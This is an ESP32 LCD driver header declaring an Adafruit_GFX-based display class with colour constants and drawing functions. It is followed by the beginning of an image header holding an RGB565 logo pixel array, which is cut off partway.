// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef _IOT_LCD_H_
#define _IOT_LCD_H_
/*This is the Adafruit subclass graphics file*/
#include "string.h"
#include "stdio.h"
#include "driver/gpio.h"
#include "driver/spi_master.h"
#include "esp_partition.h"
#include "freertos/semphr.h"
#define LCD_TFTWIDTH 240
#define LCD_TFTHEIGHT 320
#define LCD_INVOFF 0x20
#define LCD_INVON 0x21
#define LCD_CASET 0x2A
#define LCD_PASET 0x2B
#define LCD_RAMWR 0x2C
#define LCD_MADCTL 0x36
// Color definitions
#define COLOR_BLACK 0x0000 /* 0, 0, 0 */
#define COLOR_NAVY 0x000F /* 0, 0, 128 */
#define COLOR_DARKGREEN 0x03E0 /* 0, 128, 0 */
#define COLOR_DARKCYAN 0x03EF /* 0, 128, 128 */
#define COLOR_MAROON 0x7800 /* 128, 0, 0 */
#define COLOR_PURPLE 0x780F /* 128, 0, 128 */
#define COLOR_OLIVE 0x7BE0 /* 128, 128, 0 */
#define COLOR_LIGHTGREY 0xC618 /* 192, 192, 192 */
#define COLOR_DARKGREY 0x7BEF /* 128, 128, 128 */
#define COLOR_BLUE 0x001F /* 0, 0, 255 */
#define COLOR_GREEN 0x07E0 /* 0, 255, 0 */
#define COLOR_CYAN 0x07FF /* 0, 255, 255 */
#define COLOR_RED 0xF800 /* 255, 0, 0 */
#define COLOR_MAGENTA 0xF81F /* 255, 0, 255 */
#define COLOR_YELLOW 0xFFE0 /* 255, 255, 0 */
#define COLOR_WHITE 0xFFFF /* 255, 255, 255 */
#define COLOR_ORANGE 0xFD20 /* 255, 165, 0 */
#define COLOR_GREENYELLOW 0xAFE5 /* 173, 255, 47 */
#define COLOR_PINK 0xF81F
#define COLOR_SILVER 0xC618
#define COLOR_GRAY 0x8410
#define COLOR_LIME 0x07E0
#define COLOR_TEAL 0x0410
#define COLOR_FUCHSIA 0xF81F
#define COLOR_ESP_BKGD 0xD185
#define MAKEWORD(b1, b2, b3, b4) ((uint32_t) ((b1) | ((b2) << 8) | ((b3) << 16) | ((b4) << 24)))
typedef enum {
LCD_MOD_ILI9341 = 0,
LCD_MOD_ST7789 = 1,
LCD_MOD_AUTO_DET = 3,
} lcd_model_t;
/**
* @brief struct to map GPIO to LCD pins
*/
typedef struct {
lcd_model_t lcd_model;
int8_t pin_num_miso; /*!<MasterIn, SlaveOut pin*/
int8_t pin_num_mosi; /*!<MasterOut, SlaveIn pin*/
int8_t pin_num_clk; /*!<SPI Clock pin*/
int8_t pin_num_cs; /*!<SPI Chip Select Pin*/
int8_t pin_num_dc; /*!<Pin to select Data or Command for LCD*/
int8_t pin_num_rst; /*!<Pin to hardreset LCD*/
int8_t pin_num_bckl; /*!<Pin for adjusting Backlight- can use PWM/DAC too*/
int clk_freq; /*!< spi clock frequency */
uint8_t rst_active_level; /*!< reset pin active level */
uint8_t bckl_active_level; /*!< back-light active level */
spi_host_device_t spi_host; /*!< spi host index*/
bool init_spi_bus;
} lcd_conf_t;
/**
* @brief struct holding LCD IDs
*/
typedef struct {
uint8_t mfg_id; /*!<Manufacturer's ID*/
uint8_t lcd_driver_id; /*!<LCD driver Version ID*/
uint8_t lcd_id; /*!<LCD Unique ID*/
uint32_t id;
} lcd_id_t;
typedef struct {
uint8_t dc_io;
uint8_t dc_level;
} lcd_dc_t;
#ifdef __cplusplus
#include "Adafruit_GFX.h"
class CEspLcd: public Adafruit_GFX
{
private:
spi_device_handle_t spi_wr = NULL;
uint8_t tabcolor;
bool dma_mode;
int dma_buf_size;
uint8_t m_dma_chan;
uint16_t m_height;
uint16_t m_width;
SemaphoreHandle_t spi_mux;
gpio_num_t cmd_io = GPIO_NUM_MAX;
lcd_dc_t dc;
//protected:
public:
/*Below are the functions which actually send data, defined in spi_ili.c*/
void transmitCmdData(uint8_t cmd, const uint8_t data, uint8_t numDataByte);
void transmitData(uint16_t data);
void transmitData(uint8_t data);
void transmitCmdData(uint8_t cmd, uint32_t data);
void transmitData(uint16_t data, int32_t repeats);
void transmitData(uint8_t* data, int length);
void transmitCmd(uint8_t cmd);
void _fastSendBuf(const uint16_t* buf, int point_num, bool swap = true);
void _fastSendRep(uint16_t val, int rep_num);
//public:
lcd_id_t id;
CEspLcd(lcd_conf_t* lcd_conf, int height = LCD_TFTHEIGHT, int width = LCD_TFTWIDTH, bool dma_en = true, int dma_word_size = 1024, int dma_chan = 1);
~CEspLcd();
/**
* @brief init spi bus and lcd screen
* @param lcd_conf LCD parameters
*/
void setSpiBus(lcd_conf_t *lcd_conf);
void acquireBus();
void releaseBus();
/**
* @brief get LCD ID
*/
uint32_t getLcdId();
/**
* @brief fill screen background with color
* @param color Color to be filled
*/
void fillScreen(uint16_t color);
/**
* @brief fill one of the 320*240 pixels: hero function of the library
* @param x x co-ordinate of set orientation
* @param y y co-ordinate of set orientation
* @param color New color of the pixel
*/
void drawPixel(int16_t x, int16_t y, uint16_t color);
/**
* @brief Print an array of pixels: Used to display pictures usually
* @param x position X
* @param y position Y
* @param bitmap pointer to bmp array
* @param w width of image in bmp array
* @param h height of image in bmp array
*/
void drawBitmap(int16_t x, int16_t y, const uint16_t *bitmap, int16_t w, int16_t h);
void drawBitmapnotswap(int16_t x, int16_t y, const uint16_t *bitmap, int16_t w, int16_t h);
/**
* @brief Load bitmap data from flash partition and fill the pixels on LCD screen
* @param x Start position
* @param y Start position
* @param w width of image in bmp array
* @param h height of image in bmp array
* @param data_partition Flash storage that contains the bitmap data array.
* @param data_offset bitmap array begin offset
* @param malloc_pixal_size internal buffer size that driver would allocate.
* @param swap_bytes_en Whether to enable byte swap for each pixel word
*
* @return
* - ESP_FAIL if partition is NULL
* - ESP_OK on success
*/
esp_err_t drawBitmapFromFlashPartition(int16_t x, int16_t y, int16_t w, int16_t h, esp_partition_t* data_partition,
int data_offset = 0, int malloc_pixal_size = 1024, bool swap_bytes_en = true);
/**
* @brief Avoid using it, Internal use for main class drawChar API
*/
void drawBitmapFont(int16_t x, int16_t y, uint8_t w, uint8_t h, const uint16_t *bitmap);
/**
* @brief Draw a Vertical line
* @param x & y co-ordinates of start point
* @param h length of line
* @param color of the line
*/
void drawFastVLine(int16_t x, int16_t y, int16_t h, uint16_t color);
/**
* @brief Draw a Horizontal line
* @param x & y co-ordinates of start point
* @param w length of line
* @param color of the line
*/
void drawFastHLine(int16_t x, int16_t y, int16_t w, uint16_t color);
/**
* @brief Draw a filled rectangle
* @param x & y co-ordinates of start point
* @param w & h of rectangle to be displayed
* @param object color
*/
void fillRect(int16_t x, int16_t y, int16_t w, int16_t h, uint16_t color);
/**
* @brief Draw a filled rectangle
* @param r rotation between 0 to 3, landscape/portrait
*/
void setRotation(uint8_t r);
/*Yet to figure out what this does*/
void invertDisplay(bool i);
/*Not useful for user, sets the Region of Interest window*/
void setAddrWindow(uint16_t x0, uint16_t y0, uint16_t x1, uint16_t y1);
/**
* @brief Scroll on Y-axis
* @param y scroll by y num of pixels
*/
void scrollTo(uint16_t y);
/**
* @brief pass 8-bit colors, get 16bit packed number
*/
uint16_t color565(uint8_t r, uint8_t g, uint8_t b);
/**
* @brief write 7-segment float
*/
int drawFloatSevSeg(float floatNumber, uint8_t decimal, uint16_t poX, uint16_t poY, uint8_t size);
/**
* @brief write 7-segment unicode
*/
int drawUnicodeSevSeg(uint16_t uniCode, uint16_t x, uint16_t y, uint8_t size);
/**
* @brief write 7-segment string
*/
int drawStringSevSeg(const char *string, uint16_t poX, uint16_t poY, uint8_t size);
/**
* @brief write 7-segment number
*/
int drawNumberSevSeg(int long_num, uint16_t poX, uint16_t poY, uint8_t size);
int write_char(uint8_t c);
int drawString(const char *string, uint16_t x, uint16_t y);
int drawNumber(int long_num, uint16_t poX, uint16_t poY);
int drawFloat(float floatNumber, uint8_t decimal, uint16_t poX, uint16_t poY);
};
#endif
#endif
| 9,205 | iot_lcd | h | en | c | code | {"qsc_code_num_words": 1358, "qsc_code_num_chars": 9205.0, "qsc_code_mean_word_length": 4.21354934, "qsc_code_frac_words_unique": 0.31296024, "qsc_code_frac_chars_top_2grams": 0.0428172, "qsc_code_frac_chars_top_3grams": 0.01677735, "qsc_code_frac_chars_top_4grams": 0.01677735, "qsc_code_frac_chars_dupe_5grams": 0.22631947, "qsc_code_frac_chars_dupe_6grams": 0.17284166, "qsc_code_frac_chars_dupe_7grams": 0.15064663, "qsc_code_frac_chars_dupe_8grams": 0.14575323, "qsc_code_frac_chars_dupe_9grams": 0.14330654, "qsc_code_frac_chars_dupe_10grams": 0.096295, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.06754386, "qsc_code_frac_chars_whitespace": 0.25692558, "qsc_code_size_file_byte": 9205.0, "qsc_code_num_lines": 281.0, "qsc_code_num_chars_line_max": 153.0, "qsc_code_num_chars_line_mean": 32.75800712, "qsc_code_frac_chars_alphabet": 0.76900585, "qsc_code_frac_chars_comments": 0.44367192, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.03846154, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01816052, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.03397774, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.27692308, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.36923077, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 1, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/include/image.h | /**
* Suggested tool for generating images : http://code.google.com/p/lcd-image-converter,
* The below images are 16bit 565RGB colors, using "const" to save RAM and store images in flash memory
**/
const uint16_t esp_logo[137 * 26] = {
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd103, 0xd123, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd185, 0xd185, 0xd123, 0xd103, 0xd0e3, 0xda48, 0xed55, 0xecb2, 0xe34c, 0xd9c6, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd9c6, 0xd9c6, 0xd123, 0xe38d, 0xec91, 0xe30b, 0xda07, 0xe3ef, 0xff1c, 0xffff, 0xff5d, 0xec71, 0xd164, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd123, 0xd103, 0xd103, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd103, 0xd124, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd123, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd123, 0xd103, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd103, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd9c6, 0xf638, 0xda27, 0xed14, 0xffff, 0xffff, 0xffff, 0xff1c, 0xe430, 0xd9c6, 0xe3ce, 0xffff, 0xffff, 0xf679, 0xd9c6, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd185, 0xe3ad, 0xecd3, 0xecd2, 0xe32c, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xdaca, 0xec71, 0xecf3, 0xecb2, 0xe36d, 0xd1a5, 0xd123, 0xd185, 0xd185, 0xd185, 0xd144, 0xda89, 0xecd3, 0xed34, 0xed14, 0xed13, 0xed13, 0xed14, 0xec92, 0xda28, 0xd123, 0xd185, 0xd185, 0xd185, 0xd9a5, 0xec50, 0xed13, 0xed13, 0xed13, 0xed13, 0xed13, 0xe430, 0xd9e6, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xda48, 0xec50, 0xecf3, 0xec50, 0xda48, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd9c6, 0xe3ce, 0xecf3, 0xed13, 0xec71, 0xdaeb, 0xd124, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd9e7, 0xe40f, 0xecf3, 0xed13, 0xec51, 0xdaaa, 0xd123, 0xd164, 0xd185, 0xd185, 0xd185, 0xd144, 0xe34c, 0xda69, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xda89, 0xecb2, 0xed55, 0xed14, 0xe38d, 0xd164, 0xd124, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xed95, 0xec71, 0xd0e2, 0xf659, 0xff7d, 0xffff, 0xffff, 0xffff, 0xffff, 0xff5c, 0xe32b, 0xda27, 0xff1c, 0xffff, 0xf69a, 0xd164, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe30b, 0xf6ba, 0xf5f7, 0xecb2, 0xecd2, 0xf679, 0xed75, 0xd144, 0xd185, 0xd185, 0xd144, 0xd9c6, 0xf5f7, 0xf679, 0xed34, 0xecb2, 0xecf3, 0xf5f7, 0xf6ba, 0xe3ce, 0xd144, 0xd185, 0xd185, 0xd103, 0xe430, 0xf6ba, 0xe3ef, 0xec50, 0xec50, 0xec50, 0xe430, 0xed13, 0xff1c, 0xe32b, 0xd123, 0xd185, 0xd164, 0xda07, 0xff5d, 0xec91, 0xe450, 0xec50, 0xec50, 0xec50, 0xed75, 0xfefb, 0xdaa9, 0xd124, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd124, 0xecf3, 0xf6da, 0xed54, 0xec91, 0xed54, 0xf6fb, 0xe34c, 0xd124, 0xd185, 0xd185, 0xd103, 0xe38d, 0xf6db, 0xf5d6, 0xecb2, 0xec91, 0xed34, 0xf679, 0xf638, 0xda48, 0xd144, 0xd185, 0xd185, 0xd103, 0xe40f, 0xf6fb, 0xf5b6, 0xecb2, 0xec91, 0xed54, 0xf699, 0xf5f7, 0xda07, 0xd164, 0xd185, 0xd185, 0xd103, 0xf5f7, 0xe40f, 0xd123, 0xd185, 0xd185, 0xd185, 0xd123, 0xec91, 0xf6ba, 0xecb2, 0xe3ee, 0xec50, 0xf617, 0xf699, 0xdaca, 0xd144, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd144, 0xdaeb, 0xf638, 0xd0c2, 0xd185, 0xda69, 0xda69, 0xdaa9, 0xe40f, 0xf6ba, 0xffff, 0xffff, 0xffff, 0xecb2, 0xd9c6, 0xfefb, 0xffff, 0xecb2, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xe32c, 0xff7d, 0xe34c, 0xd103, 0xd103, 0xd0e3, 0xd165, 0xdaaa, 0xd185, 0xd185, 0xd185, 0xd164, 0xf679, 0xed13, 0xd144, 0xd0e3, 0xd103, 0xd103, 0xd103, 0xe32b, 0xec50, 0xd144, 0xd185, 0xd185, 0xd103, 0xe450, 0xecf3, 0xd081, 0xd103, 0xd103, 0xd103, 0xd103, 0xd0c2, 0xe30b, 0xfefb, 0xd9c6, 0xd165, 0xd165, 0xda07, 0xf699, 0xd165, 0xd0e3, 0xd103, 0xd103, 0xd103, 0xd0c2, 0xe3ae, 0xf6ba, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xf658, 0xd9c6, 0xd0e3, 0xd103, 0xd0e3, 0xda28, 0xda48, 0xd165, 0xd185, 0xd124, 0xe32c, 0xff5d, 0xdaca, 0xd0e3, 0xd103, 0xd103, 0xd0e3, 0xd144, 0xe430, 0xdaeb, 0xd144, 0xd185, 0xd123, 0xe3ce, 0xff3c, 0xda48, 0xd0e3, 0xd103, 0xd103, 0xd0e3, 0xd185, 0xec71, 0xda89, 0xd144, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd123, 0xe3ae, 0xf6fb, 0xd9a6, 0xd0e2, 0xd123, 0xd103, 0xd103, 0xe3ce, 0xf6db, 0xda07, 0xd164, 0xd185,
0xd185, 0xd185, 0xd185, 0xd103, 0xed54, 0xe38d, 0xe32b, 0xfefb, 0xffbe, 0xff7d, 0xf638, 0xe40f, 0xda27, 0xe3ae, 0xffbe, 0xffff, 0xffff, 0xed13, 0xda27, 0xffbe, 0xffbe, 0xda07, 0xd164, 0xd185, 0xd185, 0xd165, 0xd9c6, 0xff3c, 0xe30b, 0xd0e2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd185, 0xd185, 0xd123, 0xe3ae, 0xf638, 0xd0e2, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0e2, 0xf5f7, 0xe3ce, 0xd123, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf679, 0xe30b, 0xd144, 0xd185, 0xd185, 0xd103, 0xe40f, 0xf6ba, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185, 0xd164, 0xd164, 0xd185, 0xd185, 0xd123, 0xf638, 0xe3ad, 0xd0e2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd144, 0xd185, 0xd185, 0xd164, 0xf69a, 0xdaeb, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd164, 0xd185, 0xd185, 0xd185, 0xd103, 0xf5b6, 0xe3ce, 0xd123, 0xd185, 0xd185, 0xd103, 0xf5f7, 0xe3ce, 0xd0e3, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd9e7, 0xd9c6, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xf5d6, 0xe34c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xff7d, 0xe38d, 0xda27, 0xff3c, 0xffff, 0xffff, 0xe3ad, 0xe38d, 0xffff, 0xe3ef, 0xd103, 0xd185, 0xd185, 0xd103, 0xecb2, 0xed95, 0xd0c2, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xf595, 0xd0a1, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe430, 0xed34, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd0c2, 0xf5d6, 0xe3ef, 0xd123, 0xd165, 0xda07, 0xf69a, 0xd9e7, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xf659, 0xe32c, 0xd144, 0xd185, 0xd185, 0xd185, 0xf6da, 0xdaca, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xf679, 0xdaca, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xf6ba, 0xda28, 